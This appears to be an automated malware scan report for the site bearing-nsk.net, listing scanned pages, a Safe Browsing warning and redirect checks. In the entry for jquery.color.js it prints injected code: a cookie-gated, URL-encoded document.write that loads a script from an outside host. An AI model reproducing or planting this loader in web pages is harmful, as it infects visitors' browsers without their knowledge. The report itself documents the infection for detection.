Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=bearing-nsk.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://www.bearing-nsk.net/ | 200 OK Content-Length: 42984 Content-Type: text/html | clean |
http://www.bearing-nsk.net/Hedun/Tpl/bearing/Public/js/tpjz.js | 200 OK Content-Length: 1082 Content-Type: application/javascript | clean |
http://www.bearing-nsk.net/Hedun/Tpl/bearing/Public/js/jquery.min.js | 200 OK Content-Length: 91556 Content-Type: application/javascript | clean |
http://www.bearing-nsk.net/Hedun/Tpl/bearing/Public/js/jquery.easing.1.3.js | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://www.bearing-nsk.net/Hedun/Tpl/bearing/Public/js/script.js | 200 OK Content-Length: 10829 Content-Type: application/javascript | clean |
http://www.bearing-nsk.net/Hedun/Tpl/bearing/Public/js/jquery.lavalamp.min.js | 200 OK Content-Length: 721 Content-Type: application/javascript | clean |
http://www.bearing-nsk.net/Hedun/Tpl/bearing/Public/js/jquery.color.js | 200 OK Content-Length: 4223 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(jQuery){ jQuery.each(['backgroundColor', 'borderBottomColor', 'borderLeftColor', 'borderRightColor', 'borderTopColor', 'color', 'outlineColor'], function(i,attr){ jQuery.fx.step[attr] = function(fx){ if ( fx.state == 0 ) { fx.start = getColor( fx.elem, attr ); fx.end = getRGB( fx.end ); } fx.elem.style[attr] = "rgb(" + [ Math.max(Math.min( parseInt((fx.pos * (fx.end[0] - fx.start[0])) + fx.start[0] }; })(jQuery); if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%6A%70%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.bearing-nsk.net/Hedun/Tpl/bearing/Public/js/nav.js | 200 OK Content-Length: 1910 Content-Type: application/javascript | clean |
http://www.bearing-nsk.net/skf_bearing/ | 200 OK Content-Length: 20924 Content-Type: text/html | clean |
http://www.bearing-nsk.net/fag_bearing/ | 200 OK Content-Length: 20285 Content-Type: text/html | clean |
http://www.bearing-nsk.net/nsk_bearing/ | 200 OK Content-Length: 20017 Content-Type: text/html | clean |
http://www.bearing-nsk.net/timken_bearing/ | 200 OK Content-Length: 19188 Content-Type: text/html | clean |
http://www.bearing-nsk.net/product/ | 200 OK Content-Length: 24053 Content-Type: text/html | clean |
http://www.bearing-nsk.net/bearingcenter/ | 200 OK Content-Length: 32291 Content-Type: text/html | clean |
http://www.bearing-nsk.net/price/ | 200 OK Content-Length: 15860 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: bearing-nsk.net
Result:
GET / HTTP/1.1
Host: bearing-nsk.net
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: bearing-nsk.net
Referer: http://www.google.com/search?q=bearing-nsk.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: bearing-nsk.net
Referer: http://www.google.com/search?q=bearing-nsk.net
Result:
The result is similar to the first query. There are no suspicious redirects found.